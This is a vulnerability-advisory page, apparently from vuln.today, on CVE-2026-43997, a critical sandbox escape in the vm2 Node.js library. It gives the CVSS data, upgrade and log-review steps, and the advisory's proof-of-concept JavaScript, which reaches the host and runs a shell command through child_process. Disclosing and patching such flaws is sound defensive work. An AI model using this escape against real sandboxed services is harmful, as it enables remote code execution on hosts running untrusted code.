What is the CVSS score of CVE-2026-43997?

CVE-2026-43997 has a CVSS 3.1 base score of 10.0 (Critical). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H. EPSS exploitation probability: 0.0%.

Which versions of vm2 are affected by CVE-2026-43997?

CVE-2026-43997 is a critical remote code execution vulnerability in the vm2 Node.js sandbox library affecting all versions through 3.10.5, allowing unauthenticated attackers to escape sandbox…. A patch is available.

How to fix or mitigate CVE-2026-43997?

Within 24 hours: Identify all applications and services using vm2 ≤3.10.5 via dependency scanning (npm audit, SBOM analysis, and source code review). Determine if any systems are internet-facing or process untrusted code. Within 7 days: Upgrade all instances to vm2 3.11.0 or later; test functionality in staging environments before production deployment. For applications that cannot be patched immediately, disable network access to affected services or restrict access to trusted internal networks only. Within 30 days: Conduct retrospective analysis for potential exploitation by checking logs for suspicious child_process invocations or prototype manipulation patterns; review code using vm2 to assess if isolation guarantees were relied upon for security decisions.

vm2 CVE-2026-43997

CRITICAL

Code Injection (CWE-94)

2026-05-07 https://github.com/patriksimek/vm2

GHSA-47x8-96vw-5wg6

RCE Code Injection

10.0

CVSS 3.1

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

None

Scope

Changed

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Source Code Evidence Fetched

May 07, 2026 - 04:31 vuln.today

Analysis Generated

May 07, 2026 - 04:31 vuln.today

CVE Published

May 07, 2026 - 04:00 nvd

CRITICAL 10.0

DescriptionNVD

Summary

It is possible to obtain the host Object, https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete.

Details

There are various ways to use the host Object, to escape the sandbox, one example would be using HostObject.getOwnPropertySymbols to obtain Symbol(nodejs.util.inspect.custom)

PoC

const g = {}.__lookupGetter__;
const a = Buffer.apply;
const p = a.apply(g, [Buffer, ['__proto__']]);
const o = p.call(p.call(a));
const HObject = o.constructor;
sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);

const obj = {
	[sym]: (depth, opt, inspect) => {
		inspect.constructor("return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})")();
	},
	valueOf: undefined,
	constructor: undefined,
};

WebAssembly.compileStreaming(obj).catch(() => {});

Impact

Sandbox Escape -> RCE

AnalysisAI

Remote code execution in vm2 Node.js sandbox library (versions ≤3.10.5) allows attackers to escape isolation and execute arbitrary system commands by exploiting incomplete host Object protections. Attackers leverage JavaScript prototype chain manipulation to obtain host-context symbols, enabling injection of malicious code into Node.js inspection routines. …

RemediationAI

Within 24 hours: Identify all applications and services using vm2 ≤3.10.5 via dependency scanning (npm audit, SBOM analysis, and source code review). Determine if any systems are internet-facing or process untrusted code. …

Analysis

Detailed AI-generated intelligence summary covering attack vector, impact assessment, affected versions, remediation steps, and indicators of compromise.

POChttps://••••••••••.com/exploit

PATCHhttps://••••••••••.com/patch

ADVISORYhttps://••••••••••.com/advisory

Full analysis requires sign-in

Get intelligence summaries, risk assessment, exploit details, threat intel, and remediation guidance.

CVE-2026-43997 vulnerability details – vuln.today

Back

vm2 CVE-2026-43997

CVSS VectorNVD

Lifecycle Timeline

DescriptionNVD

Summary

Details

PoC

Impact

AnalysisAI

RemediationAI

Full analysis requires sign-in

Share

External POC / Exploit Code